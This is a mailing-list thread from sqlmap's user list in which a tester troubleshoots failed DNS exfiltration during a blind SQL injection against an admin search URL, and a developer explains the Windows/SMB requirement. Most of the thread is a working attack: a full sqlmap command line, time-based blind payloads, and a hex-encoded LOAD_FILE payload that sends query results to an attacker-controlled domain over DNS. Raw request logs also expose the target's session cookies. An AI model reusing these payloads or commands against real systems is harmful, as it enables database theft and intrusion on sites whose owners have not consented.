Re: [sqlmap-users] Problem with dns exfiltration
Brought to you by:
inquisb
From: Miroslav S. <mir...@gm...> - 2014-01-23 19:25:21
|
Hi. I am pretty sure that you are targeting LAMP server, while DNS exfiltration against MySQL DBMS works only if the target is a Windows machine (LOAD_FILE is provided with a SMB path containing attacker's domain (prefixed with SQL query result as a subdomain) forcing DNS resolution). Bye On Jan 23, 2014 7:58 PM, "Chris Clements" <ccl...@ou...> wrote: > Miroslav, > > Thanks for the reply. I was looking at my tcpdump wrong. The dns traffic > I saw was from my sqlmap system itself looking up the target’s dns name, > not the target (or any other host) querying for records on my domain. > > So it seems that the target system isn’t sending dns queries out. > Anything else I can try, or am I just stuck with blind extraction here? > > > Here’s my sqlmap run and tcpdump if it helps: > > > sqlmap > ================================== > root@Maple ~/s/g/sqlmap# ./sqlmap.py -u " > https://ato.target.net/administrator/index.php?option=com_mcsearch&templateId=*/&view=searchtemplate" > --random-agent --risk=3 --level=5 -a --dbms=mysql --threads=1 > --predict-output --dns-domain=mydomain.net -v2 --banner --time-sec=10 > --tamper=between --load-cookies=/root/cookies.txt > > sqlmap/1.0-dev-ab36e5a - automatic SQL injection and database takeover > tool > http://sqlmap.org > > [!] legal disclaimer: Usage of sqlmap for attacking targets without prior > mutual consent is illegal. It is the end user's responsibility to obey all > applicable local, state and federal laws. Developers assume no liability > and are not responsible for any misuse or damage caused by this program > > [*] starting at 13:07:01 > > [13:07:01] [DEBUG] cleaning up configuration parameters > [13:07:01] [INFO] setting up DNS server instance > [13:07:01] [INFO] loading tamper script 'between' > [13:07:01] [DEBUG] setting the HTTP timeout > [13:07:01] [DEBUG] loading random HTTP User-Agent header(s) from file > '/root/sectools/git/sqlmap/txt/user-agents.txt' > [13:07:01] [INFO] fetched random HTTP User-Agent header from file > '/root/sectools/git/sqlmap/txt/user-agents.txt': Mozilla/5.0 (Windows; U; > Windows NT 6.0; en-US) AppleWebKit/533.2 (KHTML, like Gecko) > Chrome/5.0.342.1 Safari/533.2 > [13:07:01] [DEBUG] setting the HTTP method to GET > [13:07:01] [DEBUG] creating HTTP requests opener object > [13:07:01] [INFO] loading cookies from '/root/cookies.txt' > [13:07:01] [DEBUG] forcing back-end DBMS to user defined value > custom injection marking character ('*') found in option '-u'. Do you want > to process it? [Y/n/q] > [13:07:04] [INFO] testing connection to the target URL > [13:07:05] [DEBUG] declared web page charset 'utf-8' > sqlmap identified the following injection points with a total of 0 HTTP(s) > requests: > --- > Place: URI > Parameter: #1* > Type: AND/OR time-based blind > Title: MySQL > 5.0.11 OR time-based blind > Payload: > https://ato.target.net:443/administrator/index.php?option=com_mcsearch&templateId=-5154OR 7979=SLEEP(10)-- MarC/&view=searchtemplate > Vector: OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) > --- > [13:07:05] [WARNING] changes made by tampering scripts are not included in > shown payload content(s) > [13:07:05] [INFO] testing MySQL > [13:07:06] [WARNING] reflective value(s) found and filtering out > [13:07:06] [WARNING] time-based comparison needs larger statistical model. > Making a few dummy requests, please wait.. > [13:07:38] [INFO] confirming MySQL > [13:07:38] [WARNING] it is very important not to stress the network > adapter's bandwidth during usage of time-based payloads > [13:08:20] [INFO] the back-end DBMS is MySQL > [13:08:20] [INFO] fetching banner > [13:08:20] [INFO] testing for data retrieval through DNS channel > [13:08:20] [DEBUG] performed 1 queries in 0.88 seconds > [13:08:20] [ERROR] data retrieval through DNS channel failed. Turning off > DNS exfiltration support > [13:08:20] [INFO] retrieved: 5.0.95-log > [13:18:53] [DEBUG] performed 69 queries in 633.52 seconds > web application technology: Apache > back-end DBMS: MySQL >= 5.0.0 > banner: '5.0.95-log' > ================================== > > > > tcpdump > ================================== > root@Maple ~# tcpdump -nvvi eth0 port 53 > tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size > 65535 bytes > 12:35:44.667201 IP (tos 0x0, ttl 64, id 22920, offset 0, flags [DF], proto > UDP (17), length 66) > <sqlmap machine>.52795 > 8.8.8.8.53: [bad udp cksum 0xb64b -> 0xa7a3!] > 61116+ A? ato.target.net. (38) > 12:35:44.667229 IP (tos 0x0, ttl 64, id 22921, offset 0, flags [DF], proto > UDP (17), length 66) > <sqlmap machine>.52795 > 8.8.8.8.53: [bad udp cksum 0xb64b -> 0x37e7!] > 24158+ AAAA? ato.target.net. (38) > 12:35:44.710564 IP (tos 0x0, ttl 45, id 824, offset 0, flags [none], proto > UDP (17), length 151) > 8.8.8.8.53 > <sqlmap machine>.52795: [udp sum ok] 24158 q: AAAA? > ato.target.net. 0/1/0 ns: target.net. SOA ns-xxxx.awsdns-29.org. > awsdns-hostmaster.amazon.com. 1 7200 900 1209600 86400 (123) > 12:35:44.711455 IP (tos 0x0, ttl 45, id 22553, offset 0, flags [none], > proto UDP (17), length 82) > 8.8.8.8.53 > <sqlmap machine>.52795: [udp sum ok] 61116 q: A? > ato.target.net. 1/0/0 ato.target.net. A XXX.XXX.XXX.172 (54) > 12:35:44.716854 IP (tos 0x0, ttl 64, id 22922, offset 0, flags [DF], proto > UDP (17), length 66) > <sqlmap machine>.58257 > 8.8.8.8.53: [bad udp cksum 0xb64b -> 0xa3b7!] > 56658+ A? ato.target.net. (38) > 12:35:44.716880 IP (tos 0x0, ttl 64, id 22923, offset 0, flags [DF], proto > UDP (17), length 66) > <sqlmap machine>.58257 > 8.8.8.8.53: [bad udp cksum 0xb64b -> 0x6497!] > 7256+ AAAA? ato.target.net. (38) > 12:35:44.747848 IP (tos 0x0, ttl 45, id 22554, offset 0, flags [none], > proto UDP (17), length 151) > 8.8.8.8.53 > <sqlmap machine>.58257: [udp sum ok] 7256 q: AAAA? > ato.target.net. 0/1/0 ns: target.net. SOA ns-xxxx.awsdns-29.org. > awsdns-hostmaster.amazon.com. 1 7200 900 1209600 86400 (123) > 12:35:44.763158 IP (tos 0x0, ttl 45, id 49299, offset 0, flags [none], > proto UDP (17), length 82) > 8.8.8.8.53 > <sqlmap machine>.58257: [udp sum ok] 56658 q: A? > ato.target.net. 1/0/0 ato.target.net. A XXX.XXX.XXX.172 (54) > ================================== > > > > Chris > > > On Jan 23, 2014, at 1:42 AM, Miroslav Stampar <mir...@gm...> > wrote: > > Hi Chris. > > It looks quite right. It would be tremendously helpful if you could send a > console output and a tcpdump (you can limit to only port 53) for a > following run: > > sudo python sqlmap.py -u "...." --flush-session --banner --dns-domain="..." > > From your given description it looks like everything should be up and > running. > > Kind regards, > Miroslav Stampar > > > On Thu, Jan 23, 2014 at 12:46 AM, Chris Clements <ccl...@ou...>wrote: > >> Hey all, >> >> I’ve got a blind sqli that I’m exploiting with the latest sqlmap commit >> and am trying to get dns exfil to work, but am not having any luck. >> >> I start sqlmap as root with the —dns-domain option set to a domain that I >> control and have the sqlmap machine set as the authoritative NS for. >> Running with a -v6, this is the info I get: >> >> =============================================== >> [18:22:18] [INFO] testing for data retrieval through DNS channel >> [18:22:18] [PAYLOAD] -2931 OR 7252=IF((ORD(MID((SELECT >> LOAD_FILE(CONCAT(0x5c5c5c5c4d776a2e,(SELECT HEX(MID((IFNULL(CAST(8315 AS >> CHAR),0x20)),1,31))),0x2e79564e2e73656375726566696c652e6e65745c5c7456414c))),6,1))>953),SLEEP(5),7252)-- >> PyBa >> [18:22:18] [TRAFFIC OUT] HTTP request [#3]: >> GET >> /administrator/index.php?option=com_mcsearch&templateId=-2931%20OR%207252%3DIF%28%28ORD%28MID%28%28SELECT%20LOAD_FILE%28CONCAT%280x5c5c5c5c4d776a2e%2C%28SELECT%20HEX%28MID%28%28IFNULL%28CAST%288315%20AS%20CHAR%29%2C0x20%29%29%2C1%2C31%29%29%29%2C0x2e79564e2e73656375726566696c652e6e65745c5c7456414c%29%29%29%2C6%2C1%29%29%3E953%29%2CSLEEP%285%29%2C7252%29--%20PyBa/&view=searchtemplate >> HTTP/1.1 >> Accept-language: en-us,en;q=0.5 >> Accept-encoding: gzip,deflate >> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 >> User-agent: Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.1) >> Gecko/2008071719 Firefox/3.0.1 >> Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 >> >> Pragma: no-cache >> Cache-control: no-cache,no-store >> Cookie: >> Login=1;activeProfile=16469185;serviceID=1320;91370904fbecd1edf649755d657f5d32=97t8br06sreu9r846bai0t2pj0;mcid_token=0c7264be-28af-41b8-8c77-01c4fdc395ec >> Connection: close >> >> [18:22:19] [TRAFFIC IN] HTTP response [#3] (200 OK): >> Content-length: 8627 >> Content-encoding: gzip >> Set-cookie: serviceID=1320; expires=Thu, 23-Jan-2014 00:22:20 GMT; >> path=/; httponly, serviceID=1320; expires=Thu, 23-Jan-2014 00:22:20 GMT; >> path=/; httponly, mcid_token=0c7264be-28af-41b8-8c77-01c4fdc395ec; >> expires=Thu, 22-Jan-2015 23:22:20 GMT; path=/; httponly >> Expires: Mon, 1 Jan 2001 00:00:00 GMT >> Vary: Accept-Encoding >> Uri: >> https://target.net:443/administrator/index.php?option=com_mcsearch&templateId=-2931%20OR%207252%3DIF%28%28ORD%28MID%28%28SELECT%20LOAD_FILE%28CONCAT%280x5c5c5c5c4d776a2e%2C%28SELECT%20HEX%28MID%28%28IFNULL%28CAST%288315%20AS%20CHAR%29%2C0x20%29%29%2C1%2C31%29%29%29%2C0x2e79564e2e73656375726566696c652e6e65745c5c7456414c%29%29%29%2C6%2C1%29%29%3E953%29%2CSLEEP%285%29%2C7252%29--%20PyBa/&view=searchtemplate<https://target.net/administrator/index.php?option=com_mcsearch&templateId=-2931%20OR%207252%3DIF%28%28ORD%28MID%28%28SELECT%20LOAD_FILE%28CONCAT%280x5c5c5c5c4d776a2e%2C%28SELECT%20HEX%28MID%28%28IFNULL%28CAST%288315%20AS%20CHAR%29%2C0x20%29%29%2C1%2C31%29%29%29%2C0x2e79564e2e73656375726566696c652e6e65745c5c7456414c%29%29%29%2C6%2C1%29%29%3E953%29%2CSLEEP%285%29%2C7252%29--%20PyBa/&view=searchtemplate> >> Server: Apache >> Last-modified: Wed, 22 Jan 2014 23:22:20 GMT >> Connection: close >> Pragma: no-cache >> Cache-control: post-check=0, pre-check=0 >> Date: Wed, 22 Jan 2014 23:22:20 GMT >> P3p: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" >> Content-type: text/html; charset=utf-8 >> >> [18:22:19] [DEBUG] performed 1 queries in 0.51 seconds >> [18:22:19] [ERROR] data retrieval through DNS channel failed. Turning off >> DNS exfiltration support >> =============================================== >> >> If I run a tcpdump on the sqlmap machine, I see dns requests come in for “ >> target.net” and if I do manual dns queries to the domain I own, sqlmap >> responds as expected with localhost.domain.com. >> >> >> Any idea? Am I doing anything wrong? >> >> >> Chris >> >> >> >> ------------------------------------------------------------------------------ >> CenturyLink Cloud: The Leader in Enterprise Cloud Services. >> Learn Why More Businesses Are Choosing CenturyLink Cloud For >> Critical Workloads, Development Environments & Everything In Between. >> Get a Quote or Start a Free Trial Today. >> >> http://pubads.g.doubleclick.net/gampad/clk?id=119420431&iu=/4140/ostg.clktrk >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> > > > > -- > Miroslav Stampar > http://about.me/stamparm > > > |